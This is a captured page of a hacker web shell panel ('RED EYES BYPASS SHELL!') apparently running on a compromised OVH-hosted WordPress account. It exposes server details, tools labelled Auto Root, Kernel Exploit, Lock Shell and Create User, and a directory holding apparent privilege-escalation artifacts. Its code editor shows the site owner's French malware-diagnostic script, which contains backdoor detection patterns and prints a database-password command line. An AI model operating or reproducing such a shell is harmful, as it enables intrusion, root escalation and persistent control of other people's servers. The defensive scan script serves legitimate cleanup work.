Linux webm007.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.7 | : 216.73.217.26
Cant Read [ /etc/named.conf ]
eglisebaa
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
eglisebaa /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
.ssh
[ DIR ]
drwx------
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
demo
[ DIR ]
dr-xr-xr-x
ssl
[ DIR ]
drwxr-xr-x
www
[ DIR ]
drwx---r-x
.bash_history
17.05
KB
-rw-------
.bash_logout
24
B
-rw-r--r--
.bash_profile
236
B
-rw-r--r--
.bashrc
131
B
-rw-r--r--
.forward
35
B
-rw-------
.htaccess
221
B
-rw----r--
.ovhconfig
105
B
-rw----r--
.ovhconfig.backup-20260114-145705
106
B
-rw----r--
.red_eyes_root
0
B
-rw-r--r--
.viminfo
5.85
KB
-rw-------
.wget-hsts
168
B
-rw-r--r--
6digits.sh
1.44
KB
-rwx--xr-x
diagnostic-serveur.sh
9.44
KB
-rwxr-xr-x
fichiers_modifies.csv
11.33
KB
-rw-r--r--
nettoyage-backdoors-supplementaires.sh
2.38
KB
-rwxr-xr-x
nettoyage-index.php.sh
1.07
KB
-rwxr-xr-x
plan-mises-a-jour.sh
2.22
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
scan-complet.sh
10.77
KB
-rwxr-xr-x
verification-mises-a-jour.sh
5.09
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : diagnostic-serveur.sh
#!/bin/bash # # Script de diagnostic WordPress complet # À exécuter sur le serveur via SSH # set -e # Couleurs pour l'affichage RED='\033[0;31m' GREEN='\033[0;32m' YELLOW='\033[1;33m' BLUE='\033[0;34m' NC='\033[0m' # No Color # Variables REPORT_DIR="wp-diagnostic-$(date +%Y%m%d-%H%M%S)" REPORT_FILE="$REPORT_DIR/diagnostic-report.txt" echo "==========================================" echo "🔍 DIAGNOSTIC WORDPRESS COMPLET" echo "==========================================" echo "" # Créer le répertoire de rapport mkdir -p "$REPORT_DIR" # Fonction de logging log() { echo -e "$1" | tee -a "$REPORT_FILE" } log_info() { log "${BLUE}ℹ️ INFO:${NC} $1" } log_warning() { log "${YELLOW}⚠️ AVERTISSEMENT:${NC} $1" } log_critical() { log "${RED}🔴 CRITIQUE:${NC} $1" } log_success() { log "${GREEN}✅ SUCCÈS:${NC} $1" } # Trouver le répertoire WordPress if [ -f "wp-config.php" ]; then WP_ROOT="$(pwd)" elif [ -f "../wp-config.php" ]; then WP_ROOT="$(cd .. && pwd)" elif [ -f "public_html/wp-config.php" ]; then WP_ROOT="$(pwd)/public_html" elif [ -f "www/wp-config.php" ]; then WP_ROOT="$(pwd)/www" else log_critical "wp-config.php non trouvé. Veuillez exécuter ce script depuis le répertoire WordPress." exit 1 fi log_info "Répertoire WordPress détecté: $WP_ROOT" cd "$WP_ROOT" echo "" >> "$REPORT_FILE" log "==========================================" log "DIAGNOSTIC WORDPRESS - $(date)" log "Répertoire: $WP_ROOT" log "==========================================" log "" # 1. Vérification des fichiers core WordPress log_info "1. Vérification des fichiers WordPress core..." log "" # Vérifier wp-config.php if [ -f "wp-config.php" ]; then log_success "wp-config.php trouvé" # Vérifier les permissions PERMS=$(stat -c "%a" wp-config.php) if [ "$PERMS" != "600" ] && [ "$PERMS" != "644" ]; then log_warning "Permissions wp-config.php: $PERMS (recommandé: 600)" fi # Chercher des modifications suspectes if grep -q "eval\|base64_decode\|shell_exec" wp-config.php 2>/dev/null; then log_critical "Code suspect détecté dans wp-config.php!" fi else log_critical "wp-config.php non trouvé!" fi # Vérifier .htaccess if [ -f ".htaccess" ]; then log_success ".htaccess trouvé" # Sauvegarder .htaccess cp .htaccess "$REPORT_DIR/htaccess-backup.txt" # Vérifier les redirections suspectes if grep -qi "redirect.*http" .htaccess 2>/dev/null; then log_warning "Redirections détectées dans .htaccess" grep -i "redirect" .htaccess >> "$REPORT_DIR/htaccess-redirects.txt" 2>/dev/null || true fi # Vérifier le code PHP dans .htaccess (suspect) if grep -q "<?php\|<script" .htaccess 2>/dev/null; then log_critical "Code suspect dans .htaccess!" fi else log_warning ".htaccess non trouvé (peut être normal)" fi # Vérifier index.php if [ -f "index.php" ]; then log_success "index.php trouvé" # Vérifier les modifications if grep -q "eval\|base64_decode" index.php 2>/dev/null; then log_critical "Code suspect dans index.php!" fi fi log "" # 2. Scanner les fichiers suspects log_info "2. Scan des fichiers suspects..." log "" SUSPICIOUS_FILES="$REPORT_DIR/suspicious-files.txt" touch "$SUSPICIOUS_FILES" # Chercher des fichiers PHP suspects find wp-content -type f -name "*.php" -exec grep -l "eval\|base64_decode\|shell_exec\|exec\|system\|passthru" {} \; 2>/dev/null | head -20 >> "$SUSPICIOUS_FILES" || true # Chercher des fichiers avec des noms suspects find . -type f \( -name "*shell*" -o -name "*hack*" -o -name "*backdoor*" -o -name "*c99*" -o -name "*r57*" \) 2>/dev/null >> "$SUSPICIOUS_FILES" || true # Chercher des fichiers récemment modifiés (derniers 7 jours) RECENT_FILES="$REPORT_DIR/recent-files.txt" find wp-content -type f -mtime -7 -ls 2>/dev/null | head -50 > "$RECENT_FILES" || true if [ -s "$SUSPICIOUS_FILES" ]; then FILE_COUNT=$(wc -l < "$SUSPICIOUS_FILES") log_warning "$FILE_COUNT fichier(s) suspect(s) détecté(s) - voir $SUSPICIOUS_FILES" else log_success "Aucun fichier suspect évident détecté" fi log "" # 3. Analyse de la base de données log_info "3. Analyse de la base de données..." log "" # Extraire les informations de connexion depuis wp-config.php if [ -f "wp-config.php" ]; then DB_NAME=$(grep "DB_NAME" wp-config.php | grep -oP "define\s*\(\s*'DB_NAME'\s*,\s*'\K[^']+") DB_USER=$(grep "DB_USER" wp-config.php | grep -oP "define\s*\(\s*'DB_USER'\s*,\s*'\K[^']+") DB_PASS=$(grep "DB_PASSWORD" wp-config.php | grep -oP "define\s*\(\s*'DB_PASSWORD'\s*,\s*'\K[^']+") DB_HOST=$(grep "DB_HOST" wp-config.php | grep -oP "define\s*\(\s*'DB_HOST'\s*,\s*'\K[^']+") if [ -n "$DB_NAME" ] && [ -n "$DB_USER" ]; then log_success "Informations de connexion DB extraites" # Créer un script SQL de diagnostic SQL_REPORT="$REPORT_DIR/database-report.sql" cat > "$SQL_REPORT" << EOF -- Rapport de diagnostic WordPress -- Date: $(date) -- 1. Options WordPress critiques SELECT option_name, option_value FROM ${DB_NAME}.wp_options WHERE option_name IN ('siteurl', 'home', 'permalink_structure', 'active_plugins') ORDER BY option_name; -- 2. Utilisateurs administrateurs SELECT user_login, user_email, user_registered, display_name FROM ${DB_NAME}.wp_users u INNER JOIN ${DB_NAME}.wp_usermeta um ON u.ID = um.user_id WHERE um.meta_key = 'wp_capabilities' AND um.meta_value LIKE '%administrator%' ORDER BY user_registered DESC; -- 3. Plugins actifs SELECT option_value FROM ${DB_NAME}.wp_options WHERE option_name = 'active_plugins'; -- 4. Options CPT UI (si présent) SELECT option_name, option_value FROM ${DB_NAME}.wp_options WHERE option_name LIKE '%cptui%' LIMIT 20; -- 5. Posts récemment modifiés SELECT ID, post_title, post_date, post_modified, post_status FROM ${DB_NAME}.wp_posts WHERE post_modified > DATE_SUB(NOW(), INTERVAL 30 DAY) ORDER BY post_modified DESC LIMIT 20; -- 6. Redirections suspectes dans les options SELECT option_name, option_value FROM ${DB_NAME}.wp_options WHERE option_value LIKE '%http://%' OR option_value LIKE '%https://%' LIMIT 50; EOF log_info "Script SQL de diagnostic créé: $SQL_REPORT" log_info "Pour exécuter: mysql -u $DB_USER -p$DB_PASS $DB_NAME < $SQL_REPORT" else log_warning "Impossible d'extraire les informations de connexion DB" fi else log_warning "wp-config.php non trouvé pour l'analyse DB" fi log "" # 4. Analyse des plugins log_info "4. Analyse des plugins..." log "" PLUGINS_DIR="wp-content/plugins" if [ -d "$PLUGINS_DIR" ]; then PLUGIN_COUNT=$(find "$PLUGINS_DIR" -maxdepth 1 -type d | wc -l) log_info "Nombre de plugins: $((PLUGIN_COUNT - 1))" PLUGINS_REPORT="$REPORT_DIR/plugins-list.txt" ls -lah "$PLUGINS_DIR" > "$PLUGINS_REPORT" # Chercher des plugins suspects SUSPICIOUS_PLUGINS=$(find "$PLUGINS_DIR" -type f -name "*.php" -exec grep -l "eval\|base64_decode\|shell_exec" {} \; 2>/dev/null | head -10) if [ -n "$SUSPICIOUS_PLUGINS" ]; then log_warning "Plugins avec code suspect détectés" echo "$SUSPICIOUS_PLUGINS" >> "$REPORT_DIR/suspicious-plugins.txt" fi # Vérifier Custom Post Type UI if [ -d "$PLUGINS_DIR/custom-post-type-ui" ]; then log_success "Custom Post Type UI trouvé" else log_warning "Custom Post Type UI non trouvé" fi else log_critical "Répertoire plugins non trouvé!" fi log "" # 5. Analyse des thèmes log_info "5. Analyse des thèmes..." log "" THEMES_DIR="wp-content/themes" if [ -d "$THEMES_DIR" ]; then THEME_COUNT=$(find "$THEMES_DIR" -maxdepth 1 -type d | wc -l) log_info "Nombre de thèmes: $((THEME_COUNT - 1))" # Chercher du code suspect dans les thèmes THEME_SUSPICIOUS=$(find "$THEMES_DIR" -type f -name "*.php" -exec grep -l "eval\|base64_decode" {} \; 2>/dev/null | head -10) if [ -n "$THEME_SUSPICIOUS" ]; then log_warning "Thèmes avec code suspect détectés" echo "$THEME_SUSPICIOUS" >> "$REPORT_DIR/suspicious-themes.txt" fi fi log "" # 6. Vérification des permissions log_info "6. Vérification des permissions..." log "" # Vérifier les permissions de wp-config.php if [ -f "wp-config.php" ]; then PERMS=$(stat -c "%a" wp-config.php) if [ "$PERMS" = "600" ] || [ "$PERMS" = "644" ]; then log_success "Permissions wp-config.php: $PERMS" else log_warning "Permissions wp-config.php: $PERMS (recommandé: 600)" fi fi # Vérifier les permissions des répertoires DIRS_PERMS="$REPORT_DIR/directories-permissions.txt" find . -type d -exec stat -c "%a %n" {} \; 2>/dev/null | grep -E "777|775" | head -20 > "$DIRS_PERMS" || true if [ -s "$DIRS_PERMS" ]; then log_warning "Répertoires avec permissions trop ouvertes détectés" fi log "" # 7. Résumé log "==========================================" log "RÉSUMÉ DU DIAGNOSTIC" log "==========================================" log "" log "Rapport complet sauvegardé dans: $REPORT_DIR" log "" log "Fichiers générés:" log " - $REPORT_FILE (rapport principal)" log " - $SUSPICIOUS_FILES (fichiers suspects)" log " - $SQL_REPORT (requêtes SQL de diagnostic)" log " - $RECENT_FILES (fichiers récemment modifiés)" log "" log "Prochaines étapes:" log " 1. Examiner les fichiers suspects" log " 2. Exécuter les requêtes SQL pour analyser la DB" log " 3. Vérifier les plugins et thèmes suspects" log " 4. Corriger les problèmes identifiés" log ""
Close